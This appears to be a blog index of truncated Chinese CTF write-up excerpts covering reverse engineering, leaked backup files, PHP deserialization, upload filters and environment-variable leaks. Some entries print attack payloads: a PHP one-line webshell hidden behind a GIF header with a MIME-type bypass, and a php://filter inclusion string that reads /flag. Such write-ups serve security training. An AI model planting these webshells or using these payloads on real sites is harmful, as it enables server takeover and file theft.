# Reverse # easy_RE 打开 IDA 即可看到前半段 flag,F5 反汇编或者 tap 后,看到后半段 flag: # ELF 进入主函数,发现 flag 先进入了 encode 函数进行加密,然后再进行 base64 加密。 int __cdecl main(int argc, const char **argv, const char **envp) { unsigned int v3; // edx char *s1; // [rsp+0h] [rbp-20h] char *v6; // [rsp+8h] [rbp-18h] char *s; //...

# Week1 # 泄漏的秘密 粗心的网站管理员总会泄漏一些敏感信息在 Web 根目录下 题目说到敏感信息,很容易想到那几个文件,使用 dirsearch 或者其他扫描工具扫一下,发现 robots.txt 和 www.zip 备份文件。 其中 robots.txt 藏着前半段 flag: PART ONE: flag{r0bots_1s_s0_us3ful www.zip 文件藏着后半段: $PART_TWO = "_4nd_www.zip_1s_s0_d4ng3rous}"; 拼接即可得到 flag。 # Begin of...

# Web # ezupload 一道简单的 mine 绕过,上传一句话木马,用 burpsuit 抓包后,修改文件头为: Content-Type: application/gif 成功上传后访问文件用蚁剑连接即可。 一句话木马: GIF89a<?php eval($_POST['cmd']);?># php very nice 题目: <?php highlight_file(__FILE__); class Example { public $sys='Can you find the leak?';...

# Web # [签到] Include php 伪协议直接读 /flag ?SICTF=php://filter/convert.base64-encode/resource=/flag# Baby_PHP 代码审计,正则绕过 进入题目是一大串 php 代码: <?phphighlight_file(__FILE__);error_reporting(0);$query = $_SERVER['QUERY_STRING'];if (preg_match('/_|%5f|\.|%2E/i', $query)) {...

# 起: 反序列化作为 CTF 比赛的热点,从从 Orange 在 2017 年的 hitcon 出了一个 0day 的 php phar:// 反序列化给整个安全界开启了新世界的大门以后,就开始持续升温。 要想明白反系列化到底是个啥玩意, # 首先得知道什么是序列化? 以下是系统的说法: 序列化就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。 # 为什么 php 要有序列化? 这其实是为了解决 PHP 对象传递的一个问题,因为 PHP...

# php 签到 php, 文件上传 题目描述: <?phpfunction waf($filename){ $black_list = array("ph", "htaccess", "ini"); $ext = pathinfo($filename, PATHINFO_EXTENSION); foreach ($black_list as $value) { if (stristr($ext, $value)){ return false;...

# 2023/9/7 # [SWPUCTF 2021 新生赛] ez_unserialize # php,反序列化,文件泄露 打开后是一张胡桃动图。 打开源码后发现一句注释: <!--User-agent: *Disallow: 什么东西呢?-->很熟悉的配方,于是查看 robots.txt 文件: User-agent: *Disallow: /cl45s.php查看 cl45s.php 文件: <?phperror_reporting(0);show_source("cl45s.php");class wllm{...

# codes 题目:你很会写代码吗,你会写有什么用!出来混 讲的是皮 tips:flag 格式为 Nepctf {},flag 存在环境变量,无需理会 Team_Hash 根据题目提示,flag 存在于环境变量中,直接用 env命令尝试,不出意外,被过滤了。 除此之外发现 system 也被过滤了。 既然题目是一个 C 语言执行框,那么用 C 语言打印环境变量试试 先了解下 C 程序如何打印环境变量: // 程序启动时调用的函数名为 main。这个实现没有声明函数原型。它应该必须使用 int 的返回类型定义,并且不带参数: int main(void) { /*...